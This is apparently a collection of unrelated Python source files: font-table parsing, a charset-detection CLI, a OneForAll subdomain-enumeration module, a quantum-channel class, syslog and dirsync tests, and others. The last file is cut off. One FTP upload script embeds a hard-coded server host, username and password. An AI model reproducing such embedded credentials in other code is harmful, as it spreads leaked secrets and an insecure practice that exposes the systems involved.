    flags: H    # bit 0: 1=long format, 0=short format
                # bit 1: 1=attribute names, 0=no names
    numAttribs: H    # Number of attributes
'''
class table_G__l_o_c(DefaultTable.DefaultTable):
    """
    Support Graphite Gloc tables

    The table is a header followed by an array of glyph-attribute offsets
    (16- or 32-bit depending on a header flag) and an optional trailing
    array of attribute ids.
    """

    dependencies = ['Glat']

    def __init__(self, tag=None):
        DefaultTable.DefaultTable.__init__(self, tag)
        self.attribIds = None
        self.numAttribs = 0

    def decompile(self, data, ttFont):
        # Parse the fixed header, then split the remainder into the
        # locations array and the optional attribute-id array.
        _, data = sstruct.unpack2(Gloc_header, data, self)
        flags = self.flags
        del self.flags
        # flag bit 0: long (32-bit) vs short (16-bit) location entries.
        self.locations = array.array('I' if flags & 1 else 'H')
        # NOTE(review): array.fromstring/tostring are the py2-era spellings
        # (kept here for py23 compatibility); removed in Python 3.9.
        self.locations.fromstring(data[:len(data) - self.numAttribs * (flags & 2)])
        if sys.byteorder != "big": self.locations.byteswap()  # table data is big-endian
        self.attribIds = array.array('H')
        # flag bit 1: a trailing list of attribute ids is present.
        if flags & 2:
            self.attribIds.fromstring(data[-self.numAttribs * 2:])
            if sys.byteorder != "big": self.attribIds.byteswap()

    def compile(self, ttFont):
        data = sstruct.pack(Gloc_header, dict(version=1.0,
                            flags=(bool(self.attribIds) << 1) + (self.locations.typecode == 'I'),
                            numAttribs=self.numAttribs))
        # Arrays live in native byte order; swap to big-endian for output,
        # then swap back so in-memory state is left unchanged.
        if sys.byteorder != "big": self.locations.byteswap()
        data += self.locations.tostring()
        if sys.byteorder != "big": self.locations.byteswap()
        if self.attribIds:
            if sys.byteorder != "big": self.attribIds.byteswap()
            data += self.attribIds.tostring()
            if sys.byteorder != "big": self.attribIds.byteswap()
        return data

    def set(self, locations):
        # Use the long (32-bit) entry format only when some offset needs it.
        long_format = max(locations) >= 65536
        self.locations = array.array('I' if long_format else 'H', locations)

    def toXML(self, writer, ttFont):
        # Only the attribute count is round-tripped through XML; the raw
        # offsets are regenerated from the Glat table on compile.
        writer.simpletag("attributes", number=self.numAttribs)
        writer.newline()

    def fromXML(self, name, attrs, content, ttFont):
        if name == 'attributes':
            self.numAttribs = int(safeEval(attrs['number']))

    def __getitem__(self, index):
        return self.locations[index]

    def __len__(self):
        return len(self.locations)

    def __iter__(self):
        return iter(self.locations)
|
1689921
|
import argparse
import sys
from os.path import abspath
from json import dumps
from charset_normalizer import from_fp
from charset_normalizer.models import CliDetectionResult
from charset_normalizer.version import __version__
from platform import python_version
def query_yes_no(question, default="yes"):
    """Prompt the user with *question* and return True for yes, False for no.

    ``default`` picks the answer used when the user just presses <Enter>:
    "yes" (the default), "no", or None to require an explicit answer.
    Keeps re-prompting until an understandable reply is entered.

    Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    # Map each allowed default onto its prompt suffix.
    prompts = {None: " [y/n] ", "yes": " [Y/n] ", "no": " [y/N] "}
    if default not in prompts:
        raise ValueError("invalid default answer: '%s'" % default)
    prompt = prompts[default]
    while True:
        sys.stdout.write(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        if choice in valid:
            return valid[choice]
        sys.stdout.write("Please respond with 'yes' or 'no' "
                         "(or 'y' or 'n').\n")
def cli_detect(argv=None):
    """
    CLI assistant using ARGV and ArgumentParser
    :param argv: argument list to parse (None means sys.argv[1:])
    :return: 0 if everything is fine, anything else equal trouble
            (1 for bad flag combinations, 2 for normalization write errors)
    """
    parser = argparse.ArgumentParser(
        description="The Real First Universal Charset Detector. "
                    "Discover originating encoding used on text file. "
                    "Normalize text to unicode."
    )
    parser.add_argument('files', type=argparse.FileType('rb'), nargs='+', help='File(s) to be analysed')
    parser.add_argument('-v', '--verbose', action="store_true", default=False, dest='verbose',
                        help='Display complementary information about file if any. Stdout will contain logs about the detection process.')
    parser.add_argument('-a', '--with-alternative', action="store_true", default=False, dest='alternatives',
                        help='Output complementary possibilities if any. Top-level JSON WILL be a list.')
    parser.add_argument('-n', '--normalize', action="store_true", default=False, dest='normalize',
                        help='Permit to normalize input file. If not set, program does not write anything.')
    parser.add_argument('-m', '--minimal', action="store_true", default=False, dest='minimal',
                        help='Only output the charset detected to STDOUT. Disabling JSON output.')
    parser.add_argument('-r', '--replace', action="store_true", default=False, dest='replace',
                        help='Replace file when trying to normalize it instead of creating a new one.')
    parser.add_argument('-f', '--force', action="store_true", default=False, dest='force',
                        help='Replace file without asking if you are sure, use this flag with caution.')
    parser.add_argument('-t', '--threshold', action="store", default=0.1, type=float, dest='threshold',
                        help="Define a custom maximum amount of chaos allowed in decoded content. 0. <= chaos <= 1.")
    parser.add_argument(
        "--version",
        action="version",
        version="Charset-Normalizer {} - Python {}".format(__version__, python_version()),
        help="Show version information and exit."
    )
    args = parser.parse_args(argv)
    # Flag sanity checks: --replace requires --normalize, --force requires --replace.
    if args.replace is True and args.normalize is False:
        print('Use --replace in addition of --normalize only.', file=sys.stderr)
        return 1
    if args.force is True and args.replace is False:
        print('Use --force in addition of --replace only.', file=sys.stderr)
        return 1
    if args.threshold < 0. or args.threshold > 1.:
        print('--threshold VALUE should be between 0. AND 1.', file=sys.stderr)
        return 1
    for my_file in args.files:
        matches = from_fp(
            my_file,
            threshold=args.threshold,
            explain=args.verbose
        )
        if len(matches) == 0:
            # Nothing plausible found: report and move on to the next file.
            print('Unable to identify originating encoding for "{}". {}'.format(my_file.name, 'Maybe try increasing maximum amount of chaos.' if args.threshold < 1. else ''), file=sys.stderr)
            if my_file.closed is False:
                my_file.close()
            continue
        # x_ accumulates CLI result records; the best match always comes first.
        x_ = []
        r_ = matches.best()
        p_ = r_.first()
        x_.append(
            CliDetectionResult(
                abspath(my_file.name),
                p_.encoding,
                p_.encoding_aliases,
                [cp for cp in p_.could_be_from_charset if cp != p_.encoding],
                p_.language,
                p_.alphabets,
                p_.bom,
                p_.percent_chaos,
                p_.percent_coherence,
                None,
                True
            )
        )
        if len(matches) > 1 and args.alternatives:
            # Append every non-best candidate as a secondary result record.
            for el in matches:
                if el != p_:
                    x_.append(
                        CliDetectionResult(
                            abspath(my_file.name),
                            el.encoding,
                            el.encoding_aliases,
                            [cp for cp in el.could_be_from_charset if cp != el.encoding],
                            el.language,
                            el.alphabets,
                            el.bom,
                            el.percent_chaos,
                            el.percent_coherence,
                            None,
                            False
                        )
                    )
        if args.normalize is True:
            if p_.encoding.startswith('utf') is True:
                # Already unicode: nothing to rewrite.
                print('"{}" file does not need to be normalized, as it already came from unicode.'.format(my_file.name), file=sys.stderr)
                if my_file.closed is False:
                    my_file.close()
                continue
            o_ = my_file.name.split('.')  # type: list[str]
            if args.replace is False:
                # Write to a sibling file with the detected encoding inserted
                # before the extension (e.g. name.cp1252.txt).
                o_.insert(-1, p_.encoding)
                if my_file.closed is False:
                    my_file.close()
            else:
                # In-place replacement: confirm with the user unless --force.
                if args.force is False and query_yes_no(
                        'Are you sure to normalize "{}" by replacing it ?'.format(my_file.name), 'no') is False:
                    if my_file.closed is False:
                        my_file.close()
                    continue
            try:
                x_[0].unicode_path = './{}'.format('.'.join(o_))
                with open(x_[0].unicode_path, 'w', encoding='utf-8') as fp:
                    fp.write(
                        str(p_)
                    )
            except IOError as e:
                print(str(e), file=sys.stderr)
                if my_file.closed is False:
                    my_file.close()
                return 2
        if my_file.closed is False:
            my_file.close()
        if args.minimal is False:
            # Full JSON report (a list when alternatives are requested).
            print(
                dumps(
                    [
                        el.__dict__ for el in x_
                    ] if args.alternatives else x_[0].__dict__,
                    ensure_ascii=True,
                    indent=4
                )
            )
        else:
            # Minimal mode: just the encoding name(s).
            print(
                ', '.join(
                    [
                        el.encoding for el in x_
                    ]
                )
            )
    return 0
if __name__ == '__main__':
    # Run the CLI when executed directly (note: the return code is not
    # forwarded to sys.exit here).
    cli_detect()
|
1689942
|
from app.thirdparty.oneforall.config import settings
from app.thirdparty.oneforall.common.query import Query
class ChinazAPI(Query):
    """Subdomain collector backed by the ChinaZ Alexa API."""

    def __init__(self, domain):
        Query.__init__(self)
        self.domain = domain
        self.module = 'Dataset'
        self.source = 'ChinazAPIQuery'
        self.addr = 'https://apidata.chinaz.com/CallAPI/Alexa'
        # API key taken from the OneForAll settings.
        self.api = settings.chinaz_api

    def query(self):
        """
        Query the API for subdomains and match subdomains in the response
        """
        self.header = self.get_header()
        self.proxy = self.get_proxy(self.source)
        params = {'key': self.api, 'domainName': self.domain}
        resp = self.get(self.addr, params)
        self.subdomains = self.collect_subdomains(resp)

    def run(self):
        """
        Execution entry point for the class
        """
        # Skip this module entirely when no API key is configured.
        if not self.have_api(self.api):
            return
        self.begin()
        self.query()
        self.finish()
        self.save_json()
        self.gen_result()
        self.save_db()
def run(domain):
    """Unified module entry point.

    :param str domain: domain name to collect subdomains for
    """
    ChinazAPI(domain).run()
if __name__ == '__main__':
    # Ad-hoc manual test: collect subdomains for example.com.
    run('example.com')
|
1689959
|
import ftplib
import sys
import os
import argparse
def get_arg_parser():
    """Construct the argument parser for this FTP upload script.

    The single positional argument is optional and falls back to a
    default sample file path.
    """
    arg_parser = argparse.ArgumentParser(
        description="Upload to ftp server",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    arg_parser.add_argument(
        "file_path",
        nargs='?',
        default="/data/test.txt",
        help="Path to the file",
    )
    return arg_parser
def cd_dir_and_auto_create(ftp, currentDir):
    """Change the FTP working directory, creating missing path components.

    Works recursively: if ``currentDir`` cannot be entered, its parent is
    ensured first, then ``currentDir`` is created and entered.  An empty
    path is a no-op (the recursion base case).

    Fix: the original bare ``except:`` swallowed every exception, including
    KeyboardInterrupt/SystemExit and unrelated network errors; we now only
    treat a permanent-error reply (e.g. 550 "no such directory") as
    "directory missing".

    Args:
        ftp: an active ``ftplib.FTP`` connection.
        currentDir: remote directory path using '/' separators.
    """
    if currentDir == "":
        return
    try:
        ftp.cwd(currentDir)
    except ftplib.error_perm:
        # Directory does not exist yet: ensure the parent, then create it.
        cd_dir_and_auto_create(ftp, "/".join(currentDir.split("/")[:-1]))
        ftp.mkd(currentDir)
        ftp.cwd(currentDir)
def upload_to_ftp(dongle_id, key, file_path):
    """Upload *file_path* to the remote FTP server.

    The destination directory is /Home/<dongle_id>/<dirname(key)>/ and is
    created on demand; the stored file keeps file_path's basename.
    """
    #print('ftp: {}, {}, {}'.format(dongle_id, key, file_path))
    # NOTE(review): host and credentials are hard-coded here — consider
    # moving them to configuration or environment variables.
    ftp = ftplib.FTP("kevo.live")
    ftp.login("openpilot", "openpilotdf")
    with open(file_path, 'rb') as f:
        remote_dir = os.path.join('/Home', dongle_id, os.path.dirname(key))
        cd_dir_and_auto_create(ftp, remote_dir)
        ftp.storbinary('STOR ' + os.path.basename(file_path), f)
    ftp.quit()
if __name__ == "__main__":
    args = get_arg_parser().parse_args(sys.argv[1:])
    # Pass the parsed path through; previously the hard-coded
    # '/data/test.txt' made the file_path CLI argument dead.
    upload_to_ftp('dongle_id', 'logname/fcamera.hevc', args.file_path)
|
1690017
|
from typing import Any, Dict, Iterable, Tuple, Union
import numpy as np
from cirq import linalg, protocols, value
from cirq._compat import proper_repr
from cirq.ops import raw_types
class MixedUnitaryChannel(raw_types.Gate):
    """A generic mixture that can record the index of its selected operator.
    This type of object is also referred to as a mixed-unitary channel.
    Args:
        mixture: a list of (probability, qubit unitary) pairs
        key: an optional measurement key string for this mixture. Simulations
            which select a single unitary to apply will store the index
            of that unitary in the measurement result list with this key.
        validate: if True, validate that `mixture` describes a valid mixture.
            This validation can be slow; prefer pre-validating if possible.
    """
    def __init__(
        self,
        mixture: Iterable[Tuple[float, np.ndarray]],
        key: Union[str, value.MeasurementKey, None] = None,
        validate: bool = False,
    ):
        mixture = list(mixture)
        if not mixture:
            raise ValueError('MixedUnitaryChannel must have at least one unitary.')
        # Probabilities must form a distribution (approx_eq tolerates float error).
        if not protocols.approx_eq(sum(p[0] for p in mixture), 1):
            raise ValueError('Unitary probabilities must sum to 1.')
        # Infer the qubit count from the first operator; it must be a square
        # matrix whose dimension is a power of two.
        m0 = mixture[0][1]
        num_qubits = np.log2(m0.shape[0])
        if not num_qubits.is_integer() or m0.shape[1] != m0.shape[0]:
            raise ValueError(
                f'Input mixture of shape {m0.shape} does not '
                'represent a square operator over qubits.'
            )
        self._num_qubits = int(num_qubits)
        # Every operator must share the first operator's shape; unitarity is
        # only checked when validate=True (it is expensive).
        for i, op in enumerate(p[1] for p in mixture):
            if not op.shape == m0.shape:
                raise ValueError(
                    f'Inconsistent unitary shapes: op[0]: {m0.shape}, op[{i}]: {op.shape}'
                )
            if validate and not linalg.is_unitary(op):
                raise ValueError(f'Element {i} of mixture is non-unitary.')
        self._mixture = mixture
        # Normalize a plain-string key to a MeasurementKey.
        if not isinstance(key, value.MeasurementKey) and key is not None:
            key = value.MeasurementKey(key)
        self._key = key
    @staticmethod
    def from_mixture(
        mixture: 'protocols.SupportsMixture', key: Union[str, value.MeasurementKey, None] = None
    ):
        """Creates a copy of a mixture with the given measurement key."""
        return MixedUnitaryChannel(mixture=list(protocols.mixture(mixture)), key=key)
    def __eq__(self, other) -> bool:
        # Equal iff keys match exactly and probabilities/operators match up
        # to np.allclose numeric tolerance.
        if not isinstance(other, MixedUnitaryChannel):
            return NotImplemented
        if self._key != other._key:
            return False
        if not np.allclose(
            [m[0] for m in self._mixture],
            [m[0] for m in other._mixture],
        ):
            return False
        return np.allclose(
            [m[1] for m in self._mixture],
            [m[1] for m in other._mixture],
        )
    def num_qubits(self) -> int:
        """Number of qubits this channel acts on."""
        return self._num_qubits
    def _mixture_(self):
        # Mixture protocol: the (probability, unitary) pairs as constructed.
        return self._mixture
    def _measurement_key_name_(self) -> str:
        # NotImplemented signals "no measurement key" to the protocol.
        if self._key is None:
            return NotImplemented
        return str(self._key)
    def _measurement_key_obj_(self) -> value.MeasurementKey:
        if self._key is None:
            return NotImplemented
        return self._key
    def _with_measurement_key_mapping_(self, key_map: Dict[str, str]):
        # Returns self unchanged when this channel's key is not in the map.
        if self._key is None:
            return NotImplemented
        if self._key not in key_map:
            return self
        return MixedUnitaryChannel(mixture=self._mixture, key=key_map[str(self._key)])
    def _with_key_path_(self, path: Tuple[str, ...]):
        # NOTE(review): unlike the other key methods this does not guard
        # against self._key being None — confirm protocols.with_key_path
        # tolerates a None key.
        return MixedUnitaryChannel(
            mixture=self._mixture, key=protocols.with_key_path(self._key, path)
        )
    def __str__(self):
        if self._key is not None:
            return f'MixedUnitaryChannel({self._mixture}, key={self._key})'
        return f'MixedUnitaryChannel({self._mixture})'
    def __repr__(self):
        unitary_tuples = [
            '(' + repr(op[0]) + ', ' + proper_repr(op[1]) + ')' for op in self._mixture
        ]
        args = [f'mixture=[{", ".join(unitary_tuples)}]']
        if self._key is not None:
            args.append(f'key=\'{self._key}\'')
        return f'cirq.MixedUnitaryChannel({", ".join(args)})'
    def _json_dict_(self) -> Dict[str, Any]:
        return protocols.obj_to_dict_helper(self, ['_mixture', '_key'])
    @classmethod
    def _from_json_dict_(cls, _mixture, _key, **kwargs):
        # JSON stores operators as nested lists; restore them as ndarrays.
        mix_pairs = [(m[0], np.asarray(m[1])) for m in _mixture]
        return cls(mixture=mix_pairs, key=_key)
|
1690056
|
def import_class(module_name, class_name):
    """
    Import a class given the specified module name and class name.

    :param module_name: dotted module path, e.g. ``'package.module'``
    :param class_name: dotted attribute path inside that module,
        e.g. ``'Outer.Inner'``
    :return: the resolved class (or attribute) object
    :raises ImportError: if the module cannot be imported
    :raises AttributeError: if an attribute segment does not exist
    """
    import importlib
    # importlib.import_module returns the *named* module, whereas the old
    # __import__('a.b') returned the top-level package 'a', which broke
    # every dotted module name.
    klass = importlib.import_module(module_name)
    for segment in class_name.split("."):
        klass = getattr(klass, segment)
    return klass
|
1690095
|
from prefix import *
from chaperone.cutil.syslog import _syslog_spec_matcher
# (spec string, expected compiled debug expression) pairs.  The third entry
# deliberately expects the parser's error message instead of an expression.
SPECS = (
    ('*.*', '(True)'),
    ('[crond].*', '((g and "crond" == g.lower()))'),
    ('.*', 'Invalid log spec syntax: .*'),
    ('kern.*;kern.!=crit', '((not (f==0) or not p==2)) and (((f==0)))'),
    ('KERN.*;kern.!crit', '((not (f==0) or not p<=2)) and (((f==0)))'),
    ('kern.crit', '((f==0) and p<=2)'),
    ('*.=emerg;*.=crit', '(p==0) or (p==2)'),
    ('/not and\/or able/.*', '(bool(s._regexes[0].search(buf)))'),
    ('*.*;![debian-start].*;authpriv,auth.!*', '(not ((g and "debian-start" == g.lower())) and (not (f==10 or f==4)))'),
    ('*.*;![debian-start].*;!authpriv,auth.*', '(not ((g and "debian-start" == g.lower())) and not ((f==10 or f==4)))'),
    ('*.*;![debian-start].*;!authpriv,auth.!crit', '(not ((g and "debian-start" == g.lower())) and (not (f==10 or f==4) and not p<=2))'),
    ('kern.*', '((f==0))'),
    ('*.*;*.!*', '((False))'),
    ('*.*;![chaperone].*', '(not ((g and "chaperone" == g.lower())))'),
    ('kern.*;!auth,authpriv.*', '(not ((f==4 or f==10))) and (((f==0)))'),
    ('[cron].*;[daemon-tools].crit;/password/.!err', '((not bool(s._regexes[0].search(buf)) or not p<=3)) and (((g and "cron" == g.lower())) or ((g and "daemon-tools" == g.lower()) and p<=2))'),
    ('kern.*;![cron].!err', '((not (g and "cron" == g.lower()) and not p<=3)) and (((f==0)))'),
    ('[chaperone].err;[logrotate].err;!kern.*', '(not ((f==0))) and (((g and "chaperone" == g.lower()) and p<=3) or ((g and "logrotate" == g.lower()) and p<=3))'),
    ('/panic/.*;/segfault/.*;*.!=debug', '((not p==7)) and ((bool(s._regexes[0].search(buf))) or (bool(s._regexes[1].search(buf))))'),
)
class TestSyslogSpec(unittest.TestCase):
    """Each spec string must compile to the expected debug expression."""

    def test_specs(self):
        for spec, expected in SPECS:
            try:
                result = _syslog_spec_matcher(spec).debugexpr
            except Exception as ex:
                result = ex
                if 'unexpected' in str(result):
                    raise
            # Uncomment to regenerate the test table, but CHECK IT carefully!
            # print("('{0:40} '{1}'),".format(spec + "',", result))
            self.assertEqual(str(result), expected)


if __name__ == '__main__':
    unittest.main()
|
1690129
|
from enum import Enum, auto
from zemberek.core.turkish import PrimaryPos, SecondaryPos, RootAttribute, TurkishAlphabet, Turkish
from zemberek.morphology.analysis.single_analysis import SingleAnalysis
class WordAnalysisSurfaceFormatter:
    """Formats a morphological analysis back into surface text, handling
    apostrophe insertion (proper nouns, dates, runtime numerals) and several
    casing strategies selected via :class:`CaseType`."""
    ALPHABET = TurkishAlphabet.INSTANCE
    def format_(self, analysis: SingleAnalysis, apostrophe: str) -> str:
        """Render *analysis* as lemma(+apostrophe)+ending.

        When no apostrophe is supplied and none is required, the ending is
        appended directly (normalized lemma for NoQuote items, raw stem
        otherwise); otherwise an apostrophe (default "'") separates the
        normalized lemma from a non-empty ending.
        """
        item = analysis.item
        ending = analysis.get_ending()
        if apostrophe is None and not self.apostrophe_required(analysis):
            return item.normalized_lemma() + ending if RootAttribute.NoQuote in item.attributes else \
                analysis.get_stem() + ending
        else:
            if apostrophe is None:
                apostrophe = "'"
            return item.normalized_lemma() + apostrophe + ending if len(ending) > 0 else item.normalized_lemma()
    def format_to_case(self, analysis: SingleAnalysis, type_: 'WordAnalysisSurfaceFormatter.CaseType',
                       apostrophe: str) -> str:
        """Format *analysis*, then apply the requested casing strategy.

        Returns "" for an unrecognized CaseType (including MIXED_CASE).
        """
        formatted = self.format_(analysis, apostrophe)
        if type_ == WordAnalysisSurfaceFormatter.CaseType.DEFAULT_CASE:
            return formatted
        if type_ == WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE:
            # translate() first so Turkish-specific letters (e.g. I/ı) map
            # correctly before the generic lower().
            return formatted.translate(self.ALPHABET.lower_map).lower()
        if type_ == WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE:
            return formatted.translate(self.ALPHABET.upper_map).upper()
        if type_ == WordAnalysisSurfaceFormatter.CaseType.TITLE_CASE:
            return Turkish.capitalize(formatted)
        if type_ == WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE_ROOT_LOWER_CASE_ENDING:
            # Upper-case the lemma only; the ending keeps its own case and is
            # attached with an apostrophe when required.
            ending = analysis.get_ending()
            lemma_upper = analysis.item.normalized_lemma().translate(self.ALPHABET.upper_map).upper()
            if len(ending) == 0:
                return lemma_upper
            else:
                if apostrophe is None and not self.apostrophe_required(analysis):
                    return lemma_upper + ending
                if apostrophe is None:
                    apostrophe = "'"
                return lemma_upper + apostrophe + ending
        return ""
    @staticmethod
    def apostrophe_required(analysis: SingleAnalysis) -> bool:
        """True when Turkish orthography separates the suffix with an
        apostrophe: proper nouns (unless marked NoQuote), runtime numerals,
        and dates."""
        item = analysis.item
        return (item.secondary_pos == SecondaryPos.ProperNoun and RootAttribute.NoQuote not in item.attributes) \
            or (item.primary_pos == PrimaryPos.Numeral and item.has_attribute(RootAttribute.Runtime)) \
            or item.secondary_pos == SecondaryPos.Date
    def guess_case(self, inp: str) -> 'WordAnalysisSurfaceFormatter.CaseType':
        """Classify the casing of *inp* by counting letter cases.

        Falls back to checking an UPPER'lower split around an apostrophe
        before reporting MIXED_CASE.
        """
        first_letter_upper_case = False
        lower_case_count = 0
        upper_case_count = 0
        letter_count = 0
        for apostrophe_index, c in enumerate(inp):
            if c.isalpha():
                if apostrophe_index == 0:
                    # The first character's case is tracked separately so a
                    # single leading capital can be detected as TITLE_CASE.
                    first_letter_upper_case = c.isupper()
                    if first_letter_upper_case:
                        upper_case_count += 1
                    else:
                        lower_case_count += 1
                elif c.isupper():
                    upper_case_count += 1
                elif c.islower():
                    lower_case_count += 1
                letter_count += 1
        if letter_count == 0:
            return WordAnalysisSurfaceFormatter.CaseType.DEFAULT_CASE
        elif letter_count == lower_case_count:
            return WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE
        elif letter_count == upper_case_count:
            return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE
        elif first_letter_upper_case and letter_count == lower_case_count + 1:
            # A single capitalized letter counts as UPPER_CASE, not title case.
            return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE if letter_count == 1 else \
                WordAnalysisSurfaceFormatter.CaseType.TITLE_CASE
        else:
            apostrophe_index = inp.find(chr(39))  # chr(39) = "'"
            if 0 < apostrophe_index < len(inp) - 1 and self.guess_case(inp[0:apostrophe_index]) == \
                    WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE and self.guess_case(inp[apostrophe_index + 1:]) == \
                    WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE:
                return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE_ROOT_LOWER_CASE_ENDING
            else:
                return WordAnalysisSurfaceFormatter.CaseType.MIXED_CASE
    class CaseType(Enum):
        # Casing strategies accepted by format_to_case / returned by guess_case.
        DEFAULT_CASE = auto()
        LOWER_CASE = auto()
        UPPER_CASE = auto()
        TITLE_CASE = auto()
        UPPER_CASE_ROOT_LOWER_CASE_ENDING = auto()
        MIXED_CASE = auto()
|
1690175
|
import sublime
import json
import codecs
import os
is_sublime_text_3 = int(sublime.version()) >= 3000
if is_sublime_text_3:
from .settings import Settings
else:
from settings import Settings
class ProcessCache():
    """In-memory registry of running task processes, mirrored to storage."""

    _procs = []
    last_task_name = None

    @classmethod
    def get_from_storage(cls):
        """Return the persisted process list ([] when nothing is stored)."""
        return cls.storage().read() or []

    @classmethod
    def get(cls):
        """Return a shallow copy of the tracked processes."""
        return cls._procs[:]

    @classmethod
    def refresh(cls):
        """Drop every tracked process that is no longer alive."""
        for proc in cls.get():
            if not proc.is_alive():
                cls.remove(proc)

    @classmethod
    def add(cls, process):
        """Track *process* and persist its JSON form (deduplicated)."""
        cls.last_task_name = process.get_task_name()
        if process not in cls._procs:
            cls._procs.append(process)
        serialized = process.to_json()
        cls.storage().update(
            lambda procs: procs + [serialized] if serialized not in procs else procs)

    @classmethod
    def remove(cls, process):
        """Stop tracking *process* and purge it from storage by pid."""
        if process in cls._procs:
            cls._procs.remove(process)
        cls.storage().update(
            lambda procs: [proc for proc in procs if proc['pid'] != process.pid])

    @classmethod
    def kill_all(cls):
        """Kill every tracked process and reset the registry."""
        cls.each(lambda process: process.kill())
        cls.clear()

    @classmethod
    def each(cls, fn):
        """Apply *fn* to a snapshot of the tracked processes."""
        for proc in cls.get():
            fn(proc)

    @classmethod
    def empty(cls):
        """True when no processes are tracked."""
        return len(cls._procs) == 0

    @classmethod
    def clear(cls):
        """Forget all tracked processes and wipe persisted state."""
        del cls._procs[:]
        cls.storage().write([])

    @classmethod
    def storage(cls):
        """Return the persistence backend (file-backed, or a no-op Cache)."""
        if Settings.get_from_shared_data("track_processes", True):
            return CacheFile(Settings.package_path())
        return Cache()
class Cache():
    """Null storage backend: every operation is a no-op returning None."""

    def exists(self):
        """Report whether backing storage exists (always None here)."""

    def remove(self):
        """Delete backing storage (no-op)."""

    def open(self, mode="r"):
        """Open backing storage (no-op)."""

    def read(self):
        """Read stored data (always None)."""

    def write(self, data):
        """Persist *data* (no-op)."""

    def update(self, fn):
        """Transform stored data with *fn* (no-op)."""
class CacheFile(Cache):
    """JSON cache persisted to a file inside *working_dir*."""

    def __init__(self, working_dir):
        self.working_dir = working_dir
        self.cache_path = os.path.join(self.working_dir, Settings.CACHE_FILE_NAME)

    def exists(self):
        """True when the cache file is present on disk."""
        return os.path.exists(self.cache_path)

    def remove(self):
        """Delete the cache file."""
        return os.remove(self.cache_path)

    def open(self, mode="r"):
        """Open the cache file as UTF-8 text, replacing undecodable bytes."""
        return codecs.open(self.cache_path, mode, "utf-8", errors='replace')

    def read(self):
        """Return the parsed JSON payload, or [] when the file is not valid JSON."""
        with self.open() as cache_file:
            try:
                return json.load(cache_file)
            except ValueError:
                return []

    def write(self, data):
        """Serialize *data* to the cache file, writing '[]' for empty output."""
        with self.open("w") as cache_file:
            payload = json.dumps(data, ensure_ascii=False)
            cache_file.write(payload if payload else '[]')

    def update(self, fn):
        """Rewrite the cache in place as fn(current_contents)."""
        with codecs.open(self.cache_path, "r+", "utf-8", errors='replace') as cache_file:
            try:
                current = json.load(cache_file)
            except ValueError:
                current = []
            cache_file.seek(0)
            cache_file.write(json.dumps(fn(current)))
            cache_file.truncate()
|
1690185
|
import os
from ._base import DirSyncTestCase
from . import trees
from dirsync import sync
class SimpleTests(DirSyncTestCase):
    r"""Exclude/include/ignore/only filtering against the simple source tree.

    Fix: regex patterns are now raw strings — a backslash-dot inside a plain
    (non-raw) literal is an invalid escape sequence that raises a
    SyntaxWarning on Python 3.12+.  The pattern byte values are unchanged.
    """

    init_trees = (('src', trees.simple),)

    def test_simple_exclude(self):
        """Excluded dirs and .py files must not be copied."""
        sync('src', 'dst',
             'sync',
             create=True,
             exclude=(r'^dir.*$',
                      r'^.*\.py$'))
        self.assertNotExists('dst/file2.py')
        self.assertNotExists('dst/dir')

    def test_exclude_include(self):
        """An include pattern overrides a matching exclude."""
        sync('src', 'dst',
             'sync',
             create=True,
             exclude=(r'^.*\.py$',),
             include=(r'^file2\.py$',))
        self.assertExists('dst/file2.py')

    def test_exclude_include_ignore(self):
        """Ignored files are skipped even when not excluded."""
        sync('src', 'dst',
             'sync',
             create=True,
             exclude=(r'^.*\.py$',),
             ignore=(r'^.*\.txt$',),
             include=(r'^file2\.py$',))
        self.assertNotExists('dst/file1.txt')
        self.assertNotExists('dst/dir/file4.txt')

    def test_only(self):
        """The only= whitelist restricts the sync to matching files."""
        sync('src', 'dst',
             'sync',
             create=True,
             only=(r'^.*\.py$',))
        self.assertNotExists('dst/file1.txt')
        self.assertExists('dst/file2.py')
        self.assertNotExists('dst/dir/file4.txt')
        self.assertNotExists('dst/dir')
class SimpleTestsWithDst(DirSyncTestCase):
    """Sync behaviour when the destination tree already exists."""

    init_trees = (('src', trees.simple),)

    def setUp(self):
        super(SimpleTestsWithDst, self).setUp()
        sync('src', 'dst', 'sync', create=True)

    def test_ignore_file_rm_dir(self):
        """A removed-but-ignored file must survive in the destination."""
        self.rm('src/file1.txt')
        sync('src', 'dst', 'sync', ignore=('file1.txt',))
        self.assertNotExists('src/file1.txt')
        self.assertExists('dst/file1.txt')

    def test_ignore_dir(self):
        """A removed-but-ignored directory must survive in the destination."""
        self.rm('src/dir')
        sync('src', 'dst', 'sync', ignore=('dir',))
        self.assertNotExists('src/dir')
        self.assertExists('dst/dir')
class PyprojTests(DirSyncTestCase):
    """Realistic project sync exercising exclude, ignore and include together."""

    init_trees = (('src', trees.pyproj),)

    def test_real_life(self):
        exclude_patterns = (r'.*\.pyc',
                            r'^fab.*\.py$',
                            # any dir or file name starting with _ or .
                            r'^(?:.*[\\/])?[_.][^_].*$',
                            r'(?i).*/thumbs.db')
        ignore_patterns = (r'^settings/local.py$',
                           r'^static/.*\.css$',
                           r'^.*\.min.js$')
        include_patterns = (r'^_buildout/parts.cfg',)
        sync('src', 'dst',
             'sync',
             purge=True,
             create=True,
             ctime=False,
             exclude=exclude_patterns,
             ignore=ignore_patterns,
             include=include_patterns)
        for path in ('dst/.hg',
                     'dst/.hiddendir',
                     'dst/_ignoredir',
                     'dst/cpnts/base/__init__.pyc',
                     'dst/cpnts/app/__init__.pyc',
                     'dst/settings/local.py',
                     'dst/static/_scss',
                     'dst/static/css/file.css',
                     'dst/static/img/Thumbs.db',
                     'dst/static/js/file.min.js',
                     'fabfile.py',
                     'fabfile.pyc'):
            self.assertNotExists(path)
        for path in ('dst/_buildout/parts.cfg',
                     'dst/cpnts/base/__init__.py',
                     'dst/cpnts/app/__init__.py',
                     'dst/settings/local.py.sample',
                     'dst/static/css',
                     'dst/static/img',
